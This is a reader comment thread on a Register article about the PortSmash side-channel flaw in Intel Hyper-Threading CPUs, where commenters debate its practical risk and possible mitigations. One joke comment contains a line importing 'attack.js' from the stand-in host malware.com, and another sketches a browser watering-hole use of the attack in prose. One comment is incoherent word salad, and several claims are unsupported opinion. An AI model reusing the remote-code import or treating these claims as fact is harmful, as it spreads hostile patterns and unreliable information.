back to article PortSmash attack blasts hole in Intel's Hyper-Threading CPUs, leaves with secret crypto keys

Brainiacs in Cuba and Finland have found a new side-channel vulnerability in Intel x64 processors that could allow an attacker to sniff out cryptographic keys and other privileged information. Following disclosure of the flaw to Intel at the beginning of October, boffins at the Tampere University of Technology in Finland and …

  1. J. Cook Silver badge
    Boffin

    To pull off this secret surveillance, the exploit code must run on the system under attack, specifically on the same CPU core as the process you want to pry into. That means it can't be used to eavesdrop on software remotely, or easily on the same host, but it could be useful for determined miscreants and snoops who have managed to infiltrate someone else's computer. You basically have to already be able to run your own evil code on a machine in order to PortSmash it.

    Well, if someone's gotten that far to be able to run code on your machine, then it's not really your machine at that point. Just sayin'...

    on the flip side, I can see this as a legitimate problem for web hosting/cloud computing companies that cram as many instances on a box that it will handle...

    Just saying.

    1. frobnicate

      Javascript

      runs on _your_ machine.

      1. Ken Hagan Gold badge

        Re: Javascript

        Javascript runs on your machine, but it is easy to deny access to the precise timing features that would be necessary for this attack.

        Actually, it would probably be possible for OSes and VM providers to ensure that only threads in the same security context were ever scheduled on both halves of a hyper-threaded CPU. That would probably kill off a whole category of timing attacks.

        Edit: Lorribot, below, states that "Bear in mind that VMware prevents VMs from sharing a core so this would not work on that platform, I suspect other Hypervisors do much the same." so apparently this mitigation has already been partly done.

        1. Michael Wojcik Silver badge

          Re: Javascript

          but it is easy to deny access to the precise timing features that would be necessary for this attack

          Not as easy as you might think.

          That said, a more plausible case here is that an attacker gains the ability to run code with reduced privileges, and uses this to extract enough bits from a private key used by a server to break the key, and then can impersonate the server.

          It's a pivot vector.

    2. Daniel von Asmuth
      Boffin

      A hyped threat

      One gets the impression that this problem can be avoided by modifying the OS scheduler such that if it allocates two threads to a core, those threads must belong to the same process. That would also be nicer for the cache.

      1. Aitor 1

        Re: A hyped threat

        humm, like two threads from the browser?

        Sorting that out has cost too.. maybe it would be better not to have hyperthreading.

    3. Dan 55 Silver badge

      the exploit code must run on the system under attack, specifically on the same CPU core as the process you want to pry into

      So, CPU 0 it is then.

  2. whitepines

    That Intel spin...

    import * as hackyhacky from 'http://malware.com/attack.js'

    Oops.

  3. Anonymous Coward
    Anonymous Coward

    Intel always tries to drag amd into its woes. what a class act. Putin would be proud.

  4. Anonymous Coward
    Anonymous Coward

    Insecure

    "a fully expected by-design property"

  5. Anonymous Coward
    Anonymous Coward

    Still no recall

    Once intel loose in the US courts then who will use this company in their kit in the future given that the system builder is going to pick up the tab if intel don't

    1. _LC_
      Megaphone

      Re: Still no recall

      https://techreport.com/news/34209/intel-turns-in-smashing-q3-2018-financials-with-all-time-record-revenue

      [Intel turns in smashing Q3 2018 financials with all-time record revenue]

    2. Adrian 4

      Re: Still no recall

      Downvoted for misspelling lose as loose.

  6. Pascal Monett Silver badge

    Not exactly groundbreaking

    Not only is this vulnerability not usable remotely, but you already have to own the machine locally. So it's already game over, and this is the cherry on top.

    On top of that, it's already defunct on recent equipment. So, it was nice not knowing you, PortSmash.

    1. Robert Carnegie Silver badge
      Joke

      Re: Not exactly groundbreaking

      Cool name though.

      (edit) added icon -->

    2. DropBear

      Re: Not exactly groundbreaking

      "On top of that, it's already defunct on recent equipment. So, it was nice not knowing you, PortSmash."

      I did see "does not run on newer OpenSSL". What I didn't see is any mention that the same exploit is mitigated in any other software, OS or hardware (unless you consider "turn off half of your cores" a viable fix). Did they say that anywhere?

  7. Anonymous Coward
    Facepalm

    Arse and elbow reconciliation failure

    The arse side of intel designs all these performance enhancing whizzy things, whilst the elbow side advises you not to use them. Or vice versa. Way to go intel!

  8. Ozzard
    Black Helicopters

    Interesting watering-hole web attack here

    Given that all the code has to do is run on a thread on the same core, I'd be interested to see whether one could use JITted Javascript in a browser window as the snooping code. Works fine inside a sandbox - it's only doing compute, after all, so there's nothing for the sandbox to stop. Just leave it running in the window, and see if you happen to strike gold with a crypto key.

    Bonus points if you can use a spear-phishing or watering hole attack to do this on the browser of the sysadmin of an organisation you're targeting.

  9. Lorribot

    Is this just a non event?

    So I might be missing something, but...

    The PoC is running on a bare server and not a VM so is this exploitable on a VM that typically does not see hyperthreading? It will just have vCPUs not hyperthreaded cores.

    Could a rogue VM spy on other VMs using this technique? Say a bad person could create a VM in AWS and just sniff out all the crypto stuff? But what use would it be as they would not know what system the key related to?

    Bear in mind that VMware prevents VMs from sharing a core so this would not work on that platform, I suspect other Hypervisors do much the same.

    So is this just a concern for those that run servers directly on hardware and install all sort of junk software on them?

    This research needs much more work to be of any use to anyone in the real world.

    1. mevets

      Re: Is this just a non event?

      I disagree, it probably has lots of use in the real world, and has likely been used a lot. The use of this research is to alert people that this ongoing vulnerability continues.

      Deniers, clinging to ‘I can only see through the rear view mirror ,’ don’t really count as being in the real world, despite holding the keys to Downing St and the Whitehouse.

  10. well meaning but ultimately self defeating

    So much for trusted execution environments

    Actually now wondering if I can ever rely on SGX given the constant drip-feed of side channel attacks.Is this systemic, or just a function of maturity....

    1. Michael Wojcik Silver badge

      Re: So much for trusted execution environments

      Actually now wondering if I can ever rely on SGX given the constant drip-feed of side channel attacks

      That's impossible to answer without the context of a threat model.

      Security is not an absolute. It's an evaluation of relative probabilities, costs, and rewards under a threat model. SGX might well add sufficient cost, to all but extremely improbable threats, that it makes your system not worth attacking.

      It's important to be aware of side-channel and other microarchitectural vectors, but we shouldn't treat them as a reason to conclude there's no possibility of security at all. Absolute security was never an option anyway, and new attack vectors just move some of the cost mass back to defenders.

  11. amanfromMars 1 Silver badge

    Coming at All Things from Another Acute Astute Agile Angle.

    This is why developers of cryptography software are encouraged to build in defenses to thwart side-channel eavesdropping.

    Others would provide Facilitating Utilities for Side-ChanneldD Operations ..... in Alternate AI Augmented Virtual Reality Programs bound Heavenly in Live Operational Virtual Environments ..... for Practical Realisation with AI Life Style Choosing Assets ..... of Pioneering AIdVenturing Buccaneering. ...... and with Fixations on Securing and Seconding Raw Core Source Code for Almighty Missions ..... Your Future Futures Bumped into Today's Present MainStream. ...... for Current Knowledge Base Transaction/AIProAction with NEUKlearer HyperRadioProACTive IT Protection, is it most definitely definitively the Great Game Changer. :-) Or would think it to be surely so whenever it is discovered and uncovered to much more else besides too.:-)

    What do you think of Poe's Law? :-) A true confection or phantom of supposition?

    an Intel spokesperson suggested any risk can be mitigated through existing software protections, such as writing code that is resistant to SMT side-channel attacks.

    And whenever such written code is neither possible nor available, risk turns towards capitulation and engagement with .... AI Novel Beginnings? :-) Take a Walk on the Wilder Sides of Life with that Child Mother and Son if you Dare Care Share your Core AIDriver Base Engine. Do IT Right, Fit and Proper, and the Rewards in the Immaculate Temptations Delivered are the Stuff of Legend and Heavenly to Satisfy and Sate.

    And yes, that is more an observation born of and ably supported by continuing enriching experiences than not, and thus to be something else wholly different.

  12. Steve Jackson

    Most laptops can't turn SMT/HT off due to restricted / limited BIOS.

    Needs a software switch, seem to think it can be done, but is it effective?

    Like Spectre, I prefer the hardware mitigations rather than relying 100% on software.

  13. Missing Semicolon Silver badge
    FAIL

    HT was only ever a hack anyway

    TFA has the "marketing" justification for HT. The actual reason was that Windows ran so badly on a single-core processor, because there are too many blocking,non-pre-emptable processes in the UI thread. By having a second "fake" processor, it allowed parts of the UI to be responsive when other parts were locked up.

    Now single-core processors are no longer sold for Windows, HT is no longer needed.

  14. arctic_haze

    Not a big problem on a modern OS

    If your OS is Win10 you need not worry about software snooping your encrypted transmissions. All your keyboard input is sent to Redmont (and who knows where else) anyway.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like